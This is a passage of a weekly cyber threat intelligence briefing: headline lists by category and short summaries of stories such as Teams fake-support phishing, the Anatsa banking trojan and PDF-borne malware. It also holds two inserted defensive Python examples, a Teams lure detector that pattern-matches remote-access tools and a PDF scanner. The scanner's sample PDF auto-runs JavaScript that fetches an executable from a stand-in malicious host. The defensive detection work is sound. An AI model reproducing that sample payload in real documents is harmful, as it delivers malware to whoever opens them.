New LinkedIn study reveals the secret that a third of professionals are hiding at work | ZDNET

Warner Bros. Discovery sues Midjourney AI for copying its characters | The Verge

Malware

Lazarus Group Expands Malware Arsenal With PondRAT, ThemeForestRAT, and RemotePE

Cybersecurity experts issue urgent warning amid surge in Stealerium malware attacks | IT Pro

Hook v3 unleashes a shocking arsenal of ransomware overlays, fake banking prompts, spyware functions, and real-time device monitoring | TechRadar

Fake PDF tools spread malware, warns NCSC | Cybernews

TamperedChef infostealer delivered through fraudulent PDF Editor

Cybercriminals Use Fake SEO Sites to Spread TamperedChef Malware via Bogus PDF Editor

Hackers are using fake Zoom or Microsoft Teams invites to spy on all your workplace activity | TechRadar

Silver Fox Exploits Signed Drivers to Deploy ValleyRAT Backdoor - Infosecurity Magazine

Attackers Are Abusing Malicious PDFs: Here's How to Spot Them Early

Russian APT28 Deploys "NotDoor" Outlook Backdoor Against Companies in NATO Countries

File security risks rise as insiders, malware, and AI challenges converge - Help Net Security

Malicious npm Package nodejs-smtp Mimics Nodemailer, Targets Atomic and Exodus Wallets

Unknown miscreants snooping around Sitecore via sample keys • The Register

VirusTotal Finds 44 Undetected SVG Files Used to Deploy Base64-Encoded Phishing Pages

Bots/Botnets

TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts | Malwarebytes

Mobile

Hook v3 unleashes a shocking arsenal of ransomware overlays, fake banking prompts, spyware functions, and real-time device monitoring | TechRadar

Android drops 120 flaw fixes, two exploited in the wild • The Register

Over 20 Popular Android VPN Apps Share The Same Security Flaws - See If You're Affected

What Android security threats should IT know about? | TechTarget

Apple Reportedly Still Under Pressure to Give UK Government Backdoor iCloud Access - CNET

UK's demand for Apple backdoor may have been broader than previously thought

Hackers can now crash phones and downgrade 5G to 4G networks with a toolkit exploiting unencrypted pre-authentication messages | TechRadar

Google is killing a defining feature for Android phones soon - and there's one reason why | ZDNET

Brokewell Android malware delivered through fake TradingView ads

Denial of Service/DoS/DDoS

Cloudflare blocks largest recorded DDoS attack peaking at 11.5 Tbps

DDoS attacks serve as instruments of political influence and disruption - Help Net Security

DDoSing is big and getting bigger – let's kill it off • The Register

Internet of Things – IoT

Severe Hikvision HikCentral product flaws: What You Need to Know

Connected cars are smart, convenient, and open to cyberattacks - Help Net Security

Cyber Trust Mark certification and how IoT devices will qualify | TechTarget

This Company Turns Dashcams into ‘Virtual CCTV Cameras.’ Then Hackers Got In

Tesla denied having fatal crash data until a hacker found it - Ars Technica

Data Breaches/Leaks

UK government dragged for incomplete security reforms • The Register

Warning issued to Salesforce customers after hackers stole Salesloft Drift data | IT Pro

Salesloft Takes Drift Offline After OAuth Token Theft Hits Hundreds of Organizations

Zscaler, Palo Alto Networks Hacked via Salesloft Drift

JSON Config File Leaks Azure AD Credentials

Security Firms Hit by Salesforce–Salesloft Drift Breach - SecurityWeek

Attackers are turning Salesforce trust into their biggest weapon - Help Net Security

Salesloft Drift attack affects Google Workspace security | Proton

Air France Sued Over ‘Hub-and-Spoke’ Salesforce Cyberattack

Blast Radius of Salesloft Drift Attacks Remains Unclear

Sweden scrambles after ransomware attack puts sensitive worker data at risk

Gmail users warned as hackers gain access to private information

Government needs to go ‘further and faster’ on information security improvements – PublicTechnology

Social Security whistleblower who claims DOGE mishandled Americans' sensitive data resigns from post

'2.5 billion Gmail users at risk'? Entirely false, says Google | ZDNET

Major US delivery company hit in data breach with full names, SSNs and medical info of thousands exposed online | Tom's Guide

Chess.com discloses recent data breach via file transfer app

Texas sues PowerSchool over breach exposing 62M students, 880k Texans

Organised Crime & Criminal Actors

AI Is Making Cybercrime Easier For Unsophisticated Criminals

How to reclaim control over your online shopping data - Help Net Security

The Old Ways Are Still the Best for Most Cybercriminals

Hacker Impatience Can Be a Good Thing

Chinese Hackers Game Google to Boost Gambling Sites

New China-aligned crew poisons Windows servers for SEO fraud • The Register

Call for UK to lead on organised crime | Professional Security Magazine

Microsoft deploys a custom Azure Integrated HSM chip across all servers to combat the $10.2 trillion cybercrime pandemic | TechRadar

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Bitcoin’s record highs spark a surge in crypto scams | TechRadar

A quick look at sextortion at scale: 1,900 messages and 205 Bitcoin addresses spanning four years

Malicious npm Package nodejs-smtp Mimics Nodemailer, Targets Atomic and Exodus Wallets

Venus Protocol Recovers $13.5M in Phishing Attack

Fired ChangeNOW worker wants hackers to pay | Cybernews

Insider Risk and Insider Threats

File security risks rise as insiders, malware, and AI challenges converge - Help Net Security

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

LinkedIn expands company verification, mandates workplace checks for certain roles - Help Net Security

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

Insurance

How insurer strategies are evolving in response to the ransomware surge

Cyber insurance faces rate deterioration and reduced organic growth: Swiss Re - Reinsurance News

Supply Chain and Third Parties

Warning issued to Salesforce customers after hackers stole Salesloft Drift data | IT Pro

Supply-chain attack hits Zscaler via Salesloft Drift, leaking customer info

Security Firms Hit by Salesforce–Salesloft Drift Breach - SecurityWeek

Attackers are turning Salesforce trust into their biggest weapon - Help Net Security

Salesloft Drift attack affects Google Workspace security | Proton

Air France Sued Over ‘Hub-and-Spoke’ Salesforce Cyberattack

Blast Radius of Salesloft Drift Attacks Remains Unclear

16 Billion Records Exposed in Supply-Chain Data Breach on Gmail, Apple, Facebook

Cloud/SaaS

If You're Using Microsoft Teams, Beware: Hackers Could Be Targeting Your Company

JSON Config File Leaks Azure AD Credentials

TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts | Malwarebytes

Phishing Empire Runs Undetected on Google, Cloudflare

Ransomware Group Exploits Hybrid Cloud Gaps, Gains Full Azure Control in Enterprise Attacks - SecurityWeek

Hackers Exploit Microsoft Teams to Taunt Victims and Demand Ransoms

AWS nails Russia's Cozy Bear trying to nick Microsoft creds • The Register

Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users

Amazon Stops Russian APT29 Watering Hole Attack - Infosecurity Magazine

Microsoft deploys a custom Azure Integrated HSM chip across all servers to combat the $10.2 trillion cybercrime pandemic | TechRadar

Encryption

Apple Reportedly Still Under Pressure to Give UK Government Backdoor iCloud Access - CNET

UK's demand for Apple backdoor may have been broader than previously thought

What Q Day means for your business and how to prepare | TechRadar

UK's Broader Demand for Apple iCloud Backdoor Sparks Encryption Clash

Court documents shed new light on UK-Apple row over user data - BBC News

Linux and Open Source

Linux UDisks daemon Vulnerability Let Attackers Gaining Access to Files Owned by Privileged Users

Passwords, Credential Stuffing & Brute Force Attacks

UAE Cybersecurity Council warns 60 per cent of financial attacks start with stolen credentials

TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts | Malwarebytes

The Old Ways Are Still the Best for Most Cybercriminals

DocuSign Phishing Scam Mimics Apple Pay Disputes to Steal Data

DocuSign and Apple Pay Phishing Scam Steals User Credentials

'2.5 billion Gmail users at risk'? Entirely false, says Google | ZDNET

No, Google did not warn 2.5 billion Gmail users to reset passwords

Google says Gmail security is “strong and effective” as it denies major breach - Ars Technica

Social Media

LinkedIn expands company verification, mandates workplace checks for certain roles - Help Net Security

LinkedIn's new tools just made it tougher to pad your resume | ZDNET

Children at risk of identity theft and fraud from 'sharenting' - BBC News

Disney to pay $10M to settle claims it collected kids’ data on YouTube

Regulations, Fines and Legislation

UK's Broader Demand for Apple iCloud Backdoor Sparks Encryption Clash

Court documents shed new light on UK-Apple row over user data - BBC News

Security experts weigh in on UK's proposed VPN crackdown - Raconteur

Big Tech Companies in the US Have Been Told Not to Apply the Digital Services Act | WIRED

The House | The cyber security bill must go further to truly protect the UK economy

Why are so many organizations dragging their feet on NIS2 compliance? | TechRadar

Apple Reportedly Still Under Pressure to Give UK Government Backdoor iCloud Access - CNET

UK's demand for Apple backdoor may have been broader than previously thought

Ransomware payments are banned in the public sector: should businesses still pay? | IT Pro

Google Fined $379 Million by French Regulator for Cookie Consent Violations

Google told to pay $425m in privacy lawsuit - BBC News

France fines Google, SHEIN, for undercooked Cookie policies • The Register

UK human rights regulator to argue against police use of live facial recognition | Biometric Update

Cyber Trust Mark certification and how IoT devices will qualify | TechTarget

Congress tosses lifeline to cyber intel sharing, grants • The Register

Models, Frameworks and Standards

The House | The cyber security bill must go further to truly protect the UK economy

Big Tech Companies in the US Have Been Told Not to Apply the Digital Services Act | WIRED

Why are so many organizations dragging their feet on NIS2 compliance? | TechRadar

Cyber Trust Mark certification and how IoT devices will qualify | TechTarget

Is artificial intelligence a friend, foe or frenemy? NIST wants to find out - Nextgov/FCW

NIST revision of SP 800-53 highlights rising stakes in patch, update security | Biometric Update

NIST Enhances Security Controls for Improved Patching

Careers, Working in Cyber and Information Security

How gaming experience can help with a cybersecurity career - Help Net Security

Fintech CISO on How AI is Changing Cybersecurity Skillsets - Infosecurity Magazine

Law Enforcement Action and Take Downs

Ransomware gang takedowns causing explosion of new, smaller groups | The Record from Recorded Future News

Prolific Russian ransomware operator living in California enjoys rare leniency awaiting trial | CyberScoop


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 2: Evaluating Russia’s Cyber Strategy

A Playbook for Winning the Cyber War: Part 3: Evaluating China’s Cyber Strategy

A Playbook for Winning the Cyber War: Part 4: Evaluating Iran’s Cyber Strategy

A Playbook for Winning the Cyber War: Part 5: Evaluating U.S. Cyber Strategy

A Playbook for Winning the Cyber War: Part 6: Testing U.S. Policy Responses to Destructive Cyberattacks with Wargames

A Playbook for Winning the Cyber War: Part 7: How the United States Can Win

Nation State Actors

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

China

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 3: Evaluating China’s Cyber Strategy

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Chinese APT Hackers Exploit Router Vulnerabilities to Infiltrate Enterprise Environments

‘Unrestrained’ Chinese Cyberattackers May Have Stolen Data From Almost Every American - The New York Times

Salt Typhoon APT techniques revealed in new report | CSO Online

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

Czech Republic warns of Chinese solar inverter threat - PV Tech

Trump and JD Vance among targets of major Chinese cyberattack, investigators say | Euronews

Chinese Hackers Game Google to Boost Gambling Sites

New China-aligned crew poisons Windows servers for SEO fraud • The Register

US sues robot toy maker for exposing children's data to Chinese devs

Russia

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 2: Evaluating Russia’s Cyber Strategy

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users

APT28 Targets Microsoft Outlook With 'NotDoor' Malware

Russian APT28 Deploys "NotDoor" Outlook Backdoor Against Companies in NATO Countries

NATO takes aim at Russia’s GPS hacking after EU leader’s plane jammed

Sweden says Russia behind surge in GPS jamming over Baltic Sea - BBC News

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

AWS nails Russia's Cozy Bear trying to nick Microsoft creds • The Register

Amazon Stops Russian APT29 Watering Hole Attack - Infosecurity Magazine

EU blames Russia as GPS jamming disrupts president’s plane • The Register

US puts $10M bounty on Russians accused of infra attacks • The Register

"Cybersecurity is a common cause": IT Meets in Kyiv discussed how businesses can protect data and reputation | УНН

Iran

A Playbook for Winning the Cyber War: Part 1: Executive Summary

A Playbook for Winning the Cyber War: Part 4: Evaluating Iran’s Cyber Strategy

Iran MOIS Phishes 50+ Embassies, Ministries, Int'l Orgs

North Korea

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Lazarus Group Expands Malware Arsenal With PondRAT, ThemeForestRAT, and RemotePE

US Sanctions Russian National, Chinese Firm Aiding North Korean IT Workers - SecurityWeek

North Korean Hackers Exploit Threat Intel Platforms For Phishing - Infosecurity Magazine

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Internet mapping service Censys reveals state-based abuse • The Register

ICE Revives Contract With Controversial Spyware Firm Paragon

Commercial surveillanceware shrugs off sanctions, regulation • The Register


Tools and Controls

New Dire Wolf Ransomware Attack Windows Systems, Deletes Event Logs and Backup-Related Data

Security experts call for better 'offboarding' practices amid spate of insider attacks by outgoing staff | IT Pro

Security experts weigh in on UK's proposed VPN crackdown - Raconteur

Ransomware Group Exploits Hybrid Cloud Gaps, Gains Full Azure Control in Enterprise Attacks - SecurityWeek

How insurer strategies are evolving in response to the ransomware surge

When Browsers Become the Attack Surface: Rethinking Security for Scattered Spider

Software is 40% of security budgets as CISOs shift to AI defense | VentureBeat

Attackers Abuse Velociraptor Forensic Tool to Deploy Visual Studio Code for C2 Tunneling

BruteForceAI: Free AI-powered login brute force tool - Help Net Security

Security tool bloat Is the new breach vector | TechRadar

Why you should delete your browser extensions right now - or do this to stay safe | ZDNET

Please stop using your ISP's DNS

A spy among us: rethinking cybersecurity in a hybrid world | TechRadar

6 browser-based attacks all security teams should be ready for in 2025

North Korean Hackers Exploit Threat Intel Platforms For Phishing - Infosecurity Magazine

Cyber insurance faces rate deterioration and reduced organic growth: Swiss Re - Reinsurance News

Vibe coding creates brilliant, insecure apps. There are ways around that.

Winning the AI Arms Race in Financial Services Cybersecurity - Infosecurity Magazine

Why one-time security assessments are no longer sufficient [Q&A] - BetaNews

US, Allies Push for SBOMs to Bolster Cybersecurity - SecurityWeek

Threat Hunting Should Be Part of Every Security Program

AI code assistants improve production of security problems • The Register

These 4 antivirus apps are actually worse than malware

Fewer than half of Irish companies automatically back up data, survey shows – The Irish Times



Vulnerability Management

State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine

Why cyber risks lurk in legacy technology | CIO Dive

NIST revision of SP 800-53 highlights rising stakes in patch, update security | Biometric Update

PoC Code in 15 Minutes? AI Turbocharges Exploitation

Enterprises staying on Windows 10 could shell out billions • The Register

Hacked Routers Linger on the Internet for Years

Windows 11 security updates are now unskippable during setup | PCWorld

Cutting through CVE noise with real-world threat signals - Help Net Security

Healthcare Sector Takes 58 Days to Resolve Serious Vulnerabilities - Infosecurity Magazine

AI can help track an ever-growing body of vulnerabilities, CISA official says | CyberScoop

Vulnerabilities

Critical Citrix 0-Day Vulnerability Exploited Since May, Leaving Global Entities Exposed

Hackers Exploit Third-Party SonicWall SSL VPNs to Deploy Sinobi Ransomware: By Parminder Saini

WhatsApp Issues Emergency Update for Zero-Click Exploit Targeting iOS and macOS Devices

CISA Adds TP-Link and WhatsApp Flaws to KEV Catalog Amid Active Exploitation

macOS vulnerability allowed Keychain and iOS app decryption without a password - Help Net Security

Linux UDisks daemon Vulnerability Let Attackers Gaining Access to Files Owned by Privileged Users

Silver Fox Exploits Signed Drivers to Deploy ValleyRAT Backdoor - Infosecurity Magazine

High-Risk SQLi Flaw Exposes WordPress Memberships Plugin Users - Infosecurity Magazine

WordPress Theme Vulnerability Exposes 70K Sites to CSRF, SQL Attacks

WordPress Woes Continue Amid ClickFix, TDS Threats

Paid WordPress users beware - worrying security flaw puts accounts and info at risk | TechRadar

Sangoma Patches Critical Zero-Day Exploited to Hack FreePBX Servers - SecurityWeek

Sitecore zero-day vulnerability exploited by attackers (CVE-2025-53690) - Help Net Security

Microsoft says recent Windows updates cause app install issues

Severe Hikvision HikCentral product flaws: What You Need to Know

Enterprise password crew Passwordstate patches auth vuln • The Register

Experts warn of actively exploited FreePBX zero-day


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

·       Automotive

·       Construction

·       Critical National Infrastructure (CNI)

·       Defence & Space

·       Education & Academia

·       Energy & Utilities

·       Estate Agencies

·       Financial Services

·       FinTech

·       Food & Agriculture

·       Gaming & Gambling

·       Government & Public Sector (including Law Enforcement)

·       Health/Medical/Pharma

·       Hotels & Hospitality

·       Insurance

·       Legal

·       Manufacturing

·       Maritime & Shipping

·       Oil, Gas & Mining

·       OT, ICS, IIoT, SCADA & Cyber-Physical Systems

·       Retail & eCommerce

·       Small and Medium Sized Businesses (SMBs)

·       Startups

·       Telecoms

·       Third Sector & Charities

·       Transport & Aviation

·       Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

 

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 29 August 2025

Black Arrow Cyber Threat Intelligence Briefing 29 August 2025:

-Fake IT Support Attacks Hit Microsoft Teams

-KnowBe4 Report Reveals Global Financial Sector Faces Unprecedented Cyber Threat Surge

-Cyber Moves from Back Office to Boardroom, and Investors Are Paying Attention

-CISOs Evolve from Guardians to Strategic Business Architects

-Incident Response Planning Emerges as a Key Cyber Security Control in Reducing Risk: Marsh McLennan

-Insurers May Limit Payments in Cases of Unpatched Vulnerabilities

-Anatsa Android Banking Trojan Now Targeting 830 Financial Apps with 19m Downloads

-The Hidden Threat in Enterprise Security: Why It’s Time to Rethink PDFs

-Infostealers: The Silent Smash-and-Grab Driving Modern Cyber Crime

-New Cyber Threats Emerge as Old Ransomware Groups Collapse

-Ransomware Cyber Attack Virtually Shuts Down Entire US State

-Chinese Threat Actor Salt Typhoon Cyber Spies Breached 80+ Nations, FBI Warns

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Executive Summary

Our review of threat intelligence this week reinforces that cyber attackers target employees to get into the organisation’s systems: attacks via Microsoft Teams have come to the fore again, alongside more classic email phishing. We also look at how the C-Suite is addressing the challenge of cyber security, bringing the subject to the Board as a strategic enabler; this includes strengthening the leadership team’s ability to respond to a cyber incident. While many organisations look to their insurance policy as a safety net during an incident, we report on how insurers may limit their payments if they find that the organisation has not maintained sufficient security.

The second half of our review includes details of emerging and developing attacks, from Android banking applications to PDFs and information stealers. Ransomware continues to surge, driven by new attacker groups that formed after others were shut down by law enforcement; recent victims include multiple state agencies in the USA, while we also report that Chinese state-backed attackers are embedding themselves into the critical national infrastructure of countries across the world.

We remain clear that the way to improve your resilience against a cyber incident is to implement a cyber strategy based on an impartial assessment of your specific cyber risks, and to confirm how you will respond to an incident through a rehearsal exercise facilitated by an unbiased independent expert who will help you uncover and address misconceptions. All of this must be underpinned by proportionate governance aligned to a recognised framework or standard. Contact us for a no-obligation discussion on how this can work in your organisation.


Top Cyber Stories of the Last Week

Fake IT Support Attacks Hit Microsoft Teams

Researchers have uncovered a new phishing campaign exploiting Microsoft Teams, where attackers pose as IT support staff to trick employees into downloading remote access tools. Once installed, these tools give criminals full control of a system, allowing them to steal login details and install malicious software. The activity has been linked to a financially motivated group known as EncryptHub. The use of Teams highlights a shift away from traditional email-based attacks, embedding threats directly into everyday business communication. Organisations are advised to monitor Teams traffic closely, particularly for suspicious external contacts.

https://www.infosecurity-magazine.com/news/fake-support-attacks-hit-microsoft/
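As an added example (not from the briefing, nor from the researchers it cites), the Python sketch below turns the pattern above into a detection that a security team could run over Teams chat records. It assumes simplified message records with the fields shown; real Microsoft 365 audit log entries use a different schema and would need mapping first. The internal domain, the lure display names, the remote-access tool names and the sample messages are all assumptions or constructed data, not details taken from the article.

```python
"""Flag external Teams senders that look like the fake-IT-support lure.

Two signals are combined: what an individual message says (support-style
display name, request to install a remote-access tool) and fan-out (one
external account chatting to several staff), which exposes a campaign even
when each message on its own looks harmless.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Assumed: the organisation's own tenant domains (not from the briefing).
INTERNAL_DOMAINS = {"example.com"}

# Display names that mimic an internal support function. Assumed list.
LURE_NAME_RE = re.compile(
    r"\b(it ?support|help ?desk|service ?desk|it ?department|microsoft)\b", re.I
)

# Remote-access tools and installer links in message text. Assumed list; the
# briefing only says "remote access tools" and does not name these products.
REMOTE_TOOL_RE = re.compile(
    r"\b(anydesk|quick ?assist|teamviewer|screenconnect|rustdesk|remote access)\b"
    r"|https?://\S+\.(exe|msi)\b",
    re.I,
)

FANOUT_THRESHOLD = 3  # one external sender reaching this many staff = campaign


@dataclass(frozen=True)
class TeamsMessage:
    sender: str           # UPN of the sender, e.g. "helpdesk@evil.example"
    sender_display: str   # display name the recipient sees in the chat
    recipient: str        # UPN of the internal recipient
    text: str


def is_external(msg: TeamsMessage) -> bool:
    """A sender is external when its UPN domain is not one of ours."""
    domain = msg.sender.rsplit("@", 1)[-1].lower()
    return domain not in INTERNAL_DOMAINS


def message_reasons(msg: TeamsMessage) -> list[str]:
    """Per-message signals; only evaluated for external senders."""
    reasons = []
    if LURE_NAME_RE.search(msg.sender_display):
        reasons.append("support-style display name from outside the tenant")
    if REMOTE_TOOL_RE.search(msg.text):
        reasons.append("asks recipient to install or run a remote-access tool")
    return reasons


def detect_fake_it_support(messages: list[TeamsMessage]) -> dict[str, list[str]]:
    """Return {sender: sorted reasons} for external senders matching the lure."""
    alerts: dict[str, set[str]] = defaultdict(set)
    recipients: dict[str, set[str]] = defaultdict(set)

    for msg in messages:
        if not is_external(msg):
            continue  # internal chat is out of scope for this rule
        recipients[msg.sender].add(msg.recipient.lower())
        for reason in message_reasons(msg):
            alerts[msg.sender].add(reason)

    for sender, rcpts in recipients.items():
        if len(rcpts) >= FANOUT_THRESHOLD:
            alerts[sender].add(f"contacted {len(rcpts)} distinct staff")

    return {sender: sorted(reasons) for sender, reasons in alerts.items()}


# Constructed sample records, not real traffic.
SAMPLE = [
    TeamsMessage("helpdesk@contoso-support.example", "IT Support", "alice@example.com",
                 "We detected spam from your mailbox. Please open Quick Assist and share the code."),
    TeamsMessage("helpdesk@contoso-support.example", "IT Support", "bob@example.com",
                 "Hi Bob, IT here, can we do a quick call?"),
    TeamsMessage("helpdesk@contoso-support.example", "IT Support", "carol@example.com",
                 "Hi Carol, IT here, can we do a quick call?"),
    TeamsMessage("it@example.com", "IT Support", "dave@example.com",
                 "Reminder: install the patch via Software Center."),   # internal, ignored
    TeamsMessage("partner@vendor.example", "Jane Smith", "erin@example.com",
                 "Sending the revised SOW this afternoon."),             # external, benign
]

if __name__ == "__main__":
    for sender, reasons in detect_fake_it_support(SAMPLE).items():
        print(sender, "->", "; ".join(reasons))
```

The fan-out rule is the one worth keeping even if the wordlists are tuned down: a single external account opening chats with several employees in a short window is the campaign's own footprint, whatever the messages say. Pair the detection with a review of which external tenants are allowed to message staff at all.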

KnowBe4 Report Reveals Global Financial Sector Faces Unprecedented Cyber Threat Surge

Financial institutions now face cyber attacks at a scale far beyond other industries, experiencing up to 300 times more incidents annually, with intrusions rising 25% last year. Almost all major banks suffered supplier-related breaches, underlining the weakness of third-party ecosystems. The most worrying factor is people: the report found that nearly half of employees in large banks were vulnerable to phishing tests, though this can be reduced to below 5% with proper awareness training. Attackers are increasingly using stolen credentials, making detection harder and highlighting the urgent need to address human risk as part of a cyber security strategy.

https://www.itsecurityguru.org/2025/08/27/knowbe4-report-reveals-global-financial-sector-faces-unprecedented-cyber-threat-surge/

Cyber Moves from Back Office to Boardroom, and Investors Are Paying Attention

Boardrooms are now treating cyber security as a core strategic priority, with 72% of UK firms and almost all large businesses rating it as high importance. High profile breaches at major retailers have highlighted that strong defences protect not only operations but also brand value and investor confidence. Regulation is also reshaping the agenda and investors are responding, with private equity driving a surge in acquisitions of specialist firms. Increasingly, boards are favouring tailored, advisory-led solutions over generic products, embedding cyber resilience into long-term strategy.

https://www.techradar.com/pro/cyber-moves-from-back-office-to-boardroom-and-investors-are-paying-attention

CISOs Evolve from Guardians to Strategic Business Architects

The role of the Chief Information Security Officer (CISO) is shifting from a technical defender to a strategic business leader. Increasingly, CISOs are expected to embed cyber security into core decision-making, influence board discussions, and translate complex risks into clear business impacts. This change is driven by advances in artificial intelligence, stricter regulations, and more sophisticated cyber threats. While challenges remain around credibility and alignment with other executives, CISOs who position security as a business enabler can strengthen resilience, support growth, and ensure that security strategy contributes directly to long-term success.

https://www.webpronews.com/cisos-evolve-from-guardians-to-strategic-business-architects/

Incident Response Planning Emerges as a Key Cyber Security Control in Reducing Risk: Marsh McLennan

A new report from Marsh McLennan highlights that cyber incident response planning is one of the most effective ways to reduce the likelihood of a breach-related claim. Organisations that run regular response exercises are 13% less likely to suffer a significant cyber event compared with those that do not. The research shows response planning ranks as the fourth most effective control, after threat detection, monitoring, and staff awareness training. The findings stress that security tools such as detection systems and multi-factor authentication must not only be deployed but also actively managed to strengthen resilience.

https://www.businesswire.com/news/home/20250827843982/en/Incident-response-planning-emerges-as-a-key-cybersecurity-control-in-reducing-cyber-risk-Marsh-McLennan-Cyber-Risk-Intelligence-Center-report

Insurers May Limit Payments in Cases of Unpatched Vulnerabilities

Some cyber insurers are exploring limits on payouts where firms have not fixed known security flaws quickly enough, a move referred to as CVE exclusions. This approach could see claims reduced if attackers exploit older weaknesses, though it is not yet widely adopted. With more than 46,000 software vulnerabilities expected in 2025, around a third rated high or critical, many firms struggle to keep pace due to operational and legacy system constraints. Critics argue exclusions undermine the purpose of cyber insurance as a financial safeguard, and senior leaders should ensure they understand and challenge policy terms before committing.

https://www.darkreading.com/cyber-risk/cyber-insurers-may-limit-payments-breaches-unpatched-cve

Anatsa Android Banking Trojan Now Targeting 830 Financial Apps with 19m Downloads

The Anatsa Android banking trojan has grown significantly, now targeting over 830 financial and cryptocurrency applications worldwide. Previously concentrated in a handful of markets, chiefly in Europe, it has added Germany and South Korea as target countries, with over 150 new applications added to its list. Criminals distribute the malware through fake apps on Google Play that appear clean when published and later pull down the malicious payload as an update; some of these apps have been downloaded more than 50,000 times, and the identified apps total 19 million installs between them. Once active, Anatsa can steal login details, intercept messages and perform fraudulent transactions. Google has since removed the identified apps, but the threat underlines the continuing risks to mobile banking and cryptocurrency platforms.

https://www.securityweek.com/anatsa-android-banking-trojan-now-targeting-830-financial-institutions/

The Hidden Threat in Enterprise Security: Why It’s Time to Rethink PDFs

PDFs remain a largely overlooked cyber security risk, despite being central to contracts, invoices, and compliance records. Many organisations still treat them as static files, yet attackers increasingly exploit them to deliver malicious software, with over 560,000 new malware variants emerging daily. Poor document governance can also create legal liabilities under GDPR and other regulations. As AI-powered attacks accelerate breaches, unsecured PDFs present a growing weakness. Security must be embedded throughout the document lifecycle with encryption, permissions, and secure collaboration to reduce risk while supporting compliance and resilience.

https://www.techradar.com/pro/the-hidden-threat-in-enterprise-security-why-its-time-to-rethink-pdfs
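As an added example (not from the briefing or the article it summarises), the Python triage check below scans a PDF for the name objects that make a document active rather than static, which is the feature attackers rely on when using PDFs to deliver malware. Attackers also hide those names with #xx hex escapes (for example /Java#53cript), so names are decoded before matching. The risk classification, the verdict thresholds and the two sample documents are assumptions and constructed data; the name tokens themselves are standard PDF names.

```python
"""Triage a PDF for active content: scripts, auto-run actions, launches, embeds.

Works on the raw bytes, so it is fast and dependency-free, but it cannot see
inside compressed object streams; hidden_content() reports when those exist.
"""
from __future__ import annotations

import re

# Standard PDF name objects that execute code or reach outside the document.
# The descriptions and the split into "block" and "review" are my assumptions.
RISKY_NAMES = {
    "JavaScript": "embedded JavaScript",
    "JS": "embedded JavaScript (short form)",
    "OpenAction": "action runs automatically on open",
    "AA": "additional actions bound to page or field events",
    "Launch": "launches an external program",
    "EmbeddedFile": "embedded file attachment",
    "URI": "external URL",
    "SubmitForm": "posts form data to a remote server",
    "RichMedia": "Flash or other rich media object",
    "XFA": "XFA form (script-capable)",
}
BLOCK_NAMES = {"JavaScript", "JS", "Launch", "RichMedia", "XFA"}

NAME_RE = re.compile(rb"/([A-Za-z0-9#_.\-]+)")  # a PDF name token after '/'


def decode_name(raw: bytes) -> str:
    """Undo #xx escapes in a name: b'Java#53cript' -> 'JavaScript'."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def triage_pdf(data: bytes) -> dict[str, int]:
    """Count occurrences of risky names; an empty dict means nothing active seen."""
    hits: dict[str, int] = {}
    for m in NAME_RE.finditer(data):
        name = decode_name(m.group(1))
        if name in RISKY_NAMES:
            hits[name] = hits.get(name, 0) + 1
    return hits


def hidden_content(data: bytes) -> bool:
    """True when objects live in compressed object streams the scan cannot read."""
    return b"/ObjStm" in data


def verdict(hits: dict[str, int]) -> str:
    """'block' for script/launch features, 'review' for other active content."""
    if BLOCK_NAMES & hits.keys():
        return "block"
    return "review" if hits else "allow"


# Constructed sample documents (minimal, not real-world files).
BENIGN = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Auto-run JavaScript on open, with the action name hex-escaped to dodge naive greps.
MALICIOUS = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /Java#53cript /JS (app.launchURL\\("http://malicious.example/x.exe", true\\)) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("malicious", MALICIOUS)):
        hits = triage_pdf(doc)
        print(label, verdict(hits), hits, "hidden:", hidden_content(doc))
```

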